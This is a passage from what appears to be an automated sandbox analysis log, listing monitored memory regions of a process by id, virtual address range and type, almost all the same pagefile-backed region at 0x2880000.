filename = "" Region: id = 13444 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13445 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13446 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13447 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13448 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13449 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13450 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13451 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13452 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13453 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13454 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13455 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13456 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13457 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13458 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13459 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13460 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13461 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13462 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13463 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13464 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13465 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13466 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13467 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13468 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13469 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13470 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13471 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13472 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13473 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13474 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13475 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13476 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13477 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13478 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13479 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13480 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13481 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13482 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13483 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13484 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13485 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13486 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13487 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13488 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13489 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13490 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13491 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13492 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13493 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13494 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13495 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13496 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13497 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13498 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13499 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13500 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13501 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13502 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13503 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13504 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13505 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13506 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13507 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 13508 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 13509 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13510 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13511 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13512 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13513 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13514 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13515 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13516 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13517 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13518 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13519 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13520 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13521 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13522 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13523 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13524 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13525 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13526 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13527 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13528 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13529 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13530 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13531 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13532 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13533 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13534 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13535 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13536 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13537 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13538 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13539 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13540 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13541 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13542 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13543 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13544 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13545 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13546 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13547 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13548 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13549 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13550 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13551 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13552 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13553 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13554 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13555 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13556 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13557 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13558 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13559 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13560 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13561 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13562 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13563 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13564 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13565 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13566 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13567 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13568 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13569 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13570 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13571 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13572 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13573 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13574 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13575 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13576 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13577 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13578 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13579 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13580 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13581 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13582 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13583 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13584 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13585 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13586 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13587 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13588 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13589 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13590 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13591 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13592 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13593 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13594 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13595 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13596 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13597 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13598 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13599 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13600 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13601 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13602 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13603 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13604 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13605 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13606 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13607 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13608 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13609 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13610 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13611 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13612 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13613 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13614 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13615 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13616 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13617 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 13618 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 13619 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13620 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13621 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13622 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13623 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13624 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13625 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13626 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13627 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13628 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13629 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13630 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 13631 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 